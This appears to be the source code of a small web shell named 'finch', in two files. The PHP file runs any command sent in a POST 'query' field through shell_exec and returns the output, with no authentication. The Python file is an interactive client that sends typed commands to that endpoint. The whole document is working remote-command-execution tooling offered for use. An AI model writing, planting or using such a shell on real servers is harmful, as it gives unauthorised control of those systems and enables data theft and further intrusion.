File: finch.py
#!/usr/bin/env python
import sys
import requests
import os
import readline

if len(sys.argv)<2:
  print("[-] No finch link provided.")
  exit()

link = sys.argv[1];
print("[+] Connecting to ",link);

def remote(query):
  payload = {'query': query}
  r = requests.post(link, data=payload)
  return r.json();

hello = remote('hello')
if hello['result']!="finch":
  print("[-] Unable to resolve connection to finch server.")
  exit()

print("[+] Connected to",link);

try:
  while True:
    query = input("FINCH >> ")
    if query == 'exit':
      exit()
    if query == 'clear':
      os.system("clear")
      continue
    response = remote(query)
    print(response['result'])
except KeyboardInterrupt:
  exit();

File: finch.php
<?php

// Check if function name and data are provided in POST request
if (isset($_POST['query'])) {
    $query = filter_var($_POST['query'], FILTER_SANITIZE_STRING);

    if($query=='hello'){
        $result = "finch";
    }else
    $result = shell_exec($query);

    // Prepare response as JSON
    $response = array(
        'status' => 'success',
        'result' => $result
    );

} else {
    $response = array(
        'status' => 'error',
        'message' => 'Invalid request'
    );
    http_response_code(400);
}

// Return JSON response
header('Content-Type: application/json');
echo json_encode($response);

// Example function - you can replace this with your actual function

